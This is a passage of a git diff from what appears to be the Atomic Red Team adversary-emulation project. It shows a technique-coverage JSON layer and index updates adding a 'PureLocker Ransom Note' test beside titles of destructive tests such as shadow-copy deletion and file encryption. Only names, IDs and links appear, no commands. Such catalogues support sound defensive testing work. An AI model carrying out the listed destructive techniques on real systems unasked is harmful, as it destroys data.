blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://
github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/mas
ter/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"tech
niqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score
":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"
T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcana
ryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red
-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanary
co/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://git
hub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment"
:"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"com
ment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true
,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled"
:true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":tr
ue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 8f50e385..f727969f 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -602,6 +602,7 @@ impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce08
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
 impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
 impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a91df23f..cfb7be52 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -416,6 +416,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 1fa4db89..62d2f1af 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1070,6 +1070,7 @@
 - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
 - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
 - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
+ - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
